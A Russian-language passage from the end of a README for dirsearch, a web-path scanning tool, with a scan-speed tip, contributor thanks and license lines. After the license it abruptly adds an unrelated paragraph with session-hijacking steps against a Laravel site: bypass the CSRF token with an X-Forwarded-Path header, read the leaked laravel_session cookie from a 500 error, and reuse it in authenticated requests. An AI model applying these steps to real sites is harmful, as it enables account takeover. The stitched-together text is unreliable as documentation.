- Подбор по CIDR медленный? Вероятно, вы забыли уменьшить тайм-аут и количество повторных попыток запроса. Рекомендуется: `--timeout 3 --retries 1`
Contribution to original source
---------------
Мы получаем много помощи от многих людей по всему миру для улучшения этого инструмента. Большое спасибо всем, кто помогал нам до сих пор!
См. [CONTRIBUTORS.md](https://github.com/maurosoria/dirsearch/blob/master/CONTRIBUTORS.md), чтобы узнать, кто они.
#### Мы приветствуем Pull requests и запросы новых функций
License
---------------
Copyright (C) Mauro Soria ([email protected])
Разработка за 2022 (C) nu11secur1ty (https://nu11secur1ty.com/)
Лицензия: GNU General Public License, версия 2
После добавления заголовка X-Forwarded-Path, обойдя CSRF-токен,
цель возвращает 500 Internal Server Error. В ответе
мы получаем новые Session Attributes, которые раскрывают
значение cookie laravel_session.
Скопируйте значение и замените им исходное значение cookie в любом аутентифицированном запросе.